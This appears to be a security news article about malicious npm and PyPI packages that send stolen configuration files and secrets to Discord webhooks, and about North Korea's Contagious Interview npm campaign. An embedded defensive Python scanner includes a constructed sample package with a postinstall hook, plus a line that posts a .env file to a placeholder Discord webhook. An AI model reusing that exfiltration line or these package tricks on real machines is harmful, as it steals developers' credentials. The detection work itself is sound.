npm, PyPI, and RubyGems packages found to be sending developer data to Discord channels

October 14, 2025 | Ravi Lakshmanan | Malware / Typosquatting

Cybersecurity researchers have identified several malicious packages across the npm, Python, and Ruby ecosystems that leverage Discord as a command-and-control (C2) channel to send stolen data to actor-controlled webhooks.

Discord’s webhooks are a way to post messages to channels within the platform without requiring bot users or authentication, making them an attractive mechanism for attackers to exfiltrate data into channels under their control.

“The important thing is that webhook URLs are effectively write-only,” Socket researcher Olivia Brown said in her analysis. “Channel history is not made public, and defenders cannot reread previous posts just by knowing the URL.”


Socket, a software supply chain security company, said it identified a number of packages that use Discord webhooks in a variety of ways:

  • mysql-dumpdiscord (npm): siphons the contents of developer configuration files such as config.json, .env, ayarlar.js, and ayarlar.json into a Discord webhook.
  • nodejs.discord (npm): uses Discord webhooks to log alerts (an approach that is not inherently malicious).
  • malinssx, malicus, and maliinn (PyPI): use Discord as a C2 server by triggering an HTTP request to a channel whenever the package is installed with “pip install”.

“Exploiting Discord webhooks as a C2 is important because it reverses the economics of supply chain attacks,” Brown noted. “Because it’s free and fast, threat actors avoid hosting and maintaining their own infrastructure. They’re also often slipped into regular code and firewall rules, allowing them to be stolen even from secure victims.”

“When combined with install-time hooks and build scripts, a malicious package with the Discord C2 mechanism can silently siphon .env files, API keys, and host details from developer machines and CI runners long before runtime monitoring is aware of the app.”
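The install-time pattern described above (an install hook, a Discord webhook URL, and reads of secret files) can be checked for before a dependency is trusted. The scanner below is an added example written for this article, not Socket's tooling; it inspects an unpacked npm package directory and exercises itself on a constructed, inert lookalike package with a placeholder webhook URL.

```python
import json
import re
import tempfile
from pathlib import Path

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Shape of a Discord webhook URL: /api/webhooks/<channel id>/<token>
WEBHOOK_RE = re.compile(r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
# Files the article says mysql-dumpdiscord reads; matched only as quoted literals
SENSITIVE_FILES = (".env", "config.json", "ayarlar.js", "ayarlar.json")
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".py", ".rb"}

def scan_package(pkg_dir: Path) -> dict:
    """Collect install hooks, webhook URLs and secret-file literals from one unpacked package."""
    found = {"install_hooks": [], "webhooks": [], "sensitive_reads": []}
    manifest = pkg_dir / "package.json"
    if manifest.is_file():
        scripts = json.loads(manifest.read_text()).get("scripts", {})
        found["install_hooks"] = [(h, scripts[h]) for h in INSTALL_HOOKS if h in scripts]
    for path in pkg_dir.rglob("*"):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES:
            continue
        text = path.read_text(errors="ignore")
        found["webhooks"] += [(path.name, u) for u in WEBHOOK_RE.findall(text)]
        for name in SENSITIVE_FILES:
            if re.search(r"['\"]" + re.escape(name) + r"['\"]", text):
                found["sensitive_reads"].append((path.name, name))
    return found

def is_suspicious(found: dict) -> bool:
    """A webhook alone may be benign logging (cf. nodejs.discord); paired with an
    install hook or secret-file reads it matches the exfiltration pattern."""
    return bool(found["webhooks"]) and bool(found["install_hooks"] or found["sensitive_reads"])

def demo() -> tuple:
    """Scan a constructed, inert lookalike package (written to a temp dir, never executed)."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp) / "sample-pkg"
        pkg.mkdir()
        (pkg / "package.json").write_text(json.dumps(
            {"name": "sample-pkg", "scripts": {"postinstall": "node index.js"}}))
        (pkg / "index.js").write_text(
            "const fs = require('fs');\n"
            "// constructed placeholder URL, not a live webhook\n"
            "const hook = 'https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN';\n"
            "fetch(hook, {method: 'POST', body: fs.readFileSync('.env', 'utf8')});\n")
        found = scan_package(pkg)
    return found, is_suspicious(found)

if __name__ == "__main__":
    print(demo())
```

Run it over `node_modules/<name>` after `npm pack`/extract and before install, since the hooks fire at install time.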

Contagious Interview floods npm with fake packages

This disclosure comes after the company also flagged 338 malicious packages published by North Korean threat actors associated with the Contagious Interview campaign, reporting that rather than directly dropping JavaScript stealers and downloaders, they were being used to deliver cryptographic loaders that delivered malware families such as HexEval, XORIndex, and BeaverTail. In total, the packages were downloaded more than 50,000 times.

“In this latest wave, North Korean threat actors executed more than a dozen command-and-control (C2) endpoints using more than 180 fake personas tied to new npm aliases and registration emails,” security researcher Kirill Boychenko said.

Targets of this campaign include Web3, cryptocurrency, and blockchain developers, as well as job seekers in the technology sector, who are approached with high-paying opportunities on professional platforms such as LinkedIn. Targeted candidates are then instructed to complete a coding assignment by cloning a booby-trapped repository that references a malicious package (such as eslint-detector) that has already been published to the npm registry.


When run locally on a machine, the package referenced in the cloned project acts as a stealer (i.e. BeaverTail) and collects browser credentials, cryptocurrency wallet data, macOS Keychain data, keystrokes, clipboard contents, and screenshots. The malware is also designed to download additional payloads, including a cross-platform Python backdoor codenamed InvisibleFerret.

Of the hundreds of packages uploaded by the North Korean attackers, many are typosquats of legitimate packages (such as dotevn for dotenv), particularly those related to front-end frameworks such as Node.js, Express, or React. Some of the identified libraries were also found to imitate Web3 libraries (such as ethrs.js for ethers.js).

“Contagious Interview operates more like an assembly line or factory model supply chain threat than a cybercriminal hobby,” Boychenko said. “This is a state-led, quota-driven operation using permanent resources, not weekend staff, and it is not enough to simply remove malicious packages if the associated publisher accounts remain active.”

“This campaign trajectory demonstrates a durable, factory-style operation that treats the npm ecosystem as a renewable early access channel.”
